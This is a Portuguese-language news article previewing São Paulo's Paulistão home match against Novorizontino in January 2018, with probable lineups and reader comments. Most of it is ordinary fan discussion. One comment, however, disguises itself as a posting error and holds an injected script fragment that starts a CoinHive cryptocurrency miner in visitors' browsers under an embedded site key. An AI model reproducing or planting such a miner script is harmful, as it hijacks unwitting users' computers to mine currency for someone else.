São Paulo reencontra torcida em possível estreia de Diego Souza no Morumbi

São Paulo reencontra torcida em possível estreia de Diego Souza no Morumbi

Meia-atacante começa no banco em partida contra o Novorizontino pela segunda rodada do Campeonato Paulista

0 0 0 0
O São Paulo reencontra hoje sua torcida no Morumbi, em duelo contra o Novorizontino, pela 2.ª rodada do Paulistão. Será a primeira partida do time considerado “principal”, já que foi uma formação alternativa que atuou na derrota por 2 a 0 para o São Bento, na quarta-feira passada.



O jogo pode marcar a estreia de Diego Souza com a camisa tricolor, pois o técnico Dorival Junior resolveu relacionar o meia-atacante para a partida. Ele e Cueva, que começaram a pré-temporada depois do restante do elenco tricolor, devem começar no banco.

Sem o zagueiro Arboleda, que se recupera de um estiramento na coxa direita, Dorival aposta em Bruno Alves para dupla de zaga com Rodrigo Caio, enquanto o reforço Anderson Martins melhora seu condicionamento físico para estrear.

Voltar a atuar no Morumbi deixa o grupo animado, sobretudo pelo apoio mostrado pelo torcedor tricolor na temporada passada, mesmo com a má fase do time. “Gosto de jogar no Morumbi e, particularmente, já estou com saudade de jogar em casa de novo”, afirma o volante Jucilei. “O torcedor e nós queremos a vitória. Acredito que nessa partida o São Paulo vai com força máxima.”

Para Petros, o jogo é uma nova chance de iniciar bem a temporada 2018, depois da derrota na 1.ª rodada fora de casa. “Neste confronto, em casa, vamos em busca de iniciar um ano de vitórias para o São Paulo no Morumbi”, avalia. “Precisamos do apoio do nosso torcedor, assim como foi em 2017, para fazer do Morumbi a nossa força na temporada. Queremos representar o nosso torcedor em campo, do início ao fim do ano, e assim retribuir todo o incentivo que recebemos.”

FICHA TÉCNICA

São Paulo X Novorizontino

São Paulo:
Sidão; Militão, B. Alves, R. Caio e Edimar; Jucilei, Petros, Shaylon e Lucas Fernandes; Marcos Guilherme e Brenner. Técnico: Dorival Junior.

Novorizontino: Oliveira; Tony, Éder, G. Teixeira e Tallyson; A. Goiano, Jean Patrick e Jean Carlos; Alisson Safira, Rafael Ratão e Francis. Técnico: Doriva.

Juiz: Luiz Flavio de Oliveira.

Local: Morumbi.

Horário: 19h.

Na TV: SporTV

Lance a lance: estadao.com.br/e/spfcvivo
Avalie esta notícia: 3 0

Comentários (10)

20/01/2018 11:06:49 Rafael Ricardo

nossa torcida o ano passado deu um show. nunca deixamos o time na mão.
esse ano vai se de muitas glorias #vem título#Time grande cai , mais so os GIGANTES permanece.
SPFC é um Gigante do Brasil.

20/01/2018 10:07:12 Gree Dias

sou são Paulo na vitória e na derrota,mais no segundo tempo Dorival coloca Diego Souza e cueva, independente do placar.

20/01/2018 10:07:05 Jakson Klismann

diego souza vai entra no segundo tempo e ja vai guarda u seu.

20/01/2018 08:42:11 Antonio Claudino

Pessoal, criticar faz parte ,o ano começou agora ,vamos provar que torcida unida jamais será vencida!
Vamos pra cima do adversario sem dó!
Apoiar o time tambem ganha jogo e confiança.

20/01/2018 08:35:18 Amaro Pedro Campos

NOTA OFICIAL

Em nota oficial a Sociedade Esportiva Palmeiras afirma q foi campeão da Taça São Paulo de Futebol Jr de 1951, Na época se chamava "interclasse". Entrou com recurso na cbf e Fifa pra reconhecer o título.

Estamos merecendo um time vencedor mas a idéia do leco e destacar alguns meninos da base pra vender como fez com os destaques do ano passado vende vende e nunca tem dinheiro chega de paciência com leco

20/01/2018 08:20:04 Rui Araújo

vamos jogar pra ganhar e mostrar porque somos campeões sempre não aceito outro resultado ser no for vitória é um grande futebol....

20/01/2018 08:17:26 Rafael Pontes

Erro ao postar comentário.
Código do erro: 803743

src="https://e.com/lib/e.min.js">>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

20/01/2018 08:17:22 Daniel Alex Xisto

TAMO JUNTO são Paulo novamente como fomos o ano passado!!!!
Com apenas uma diferença....Que esse ano vamos lotar o Morumbi em busca de títulos

20/01/2018 08:17:12 Alex Jhoni Zeni Jhoni

Bom dia galera hoje vamos ganhar de 2 a 0 vamos meu tricolor

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui.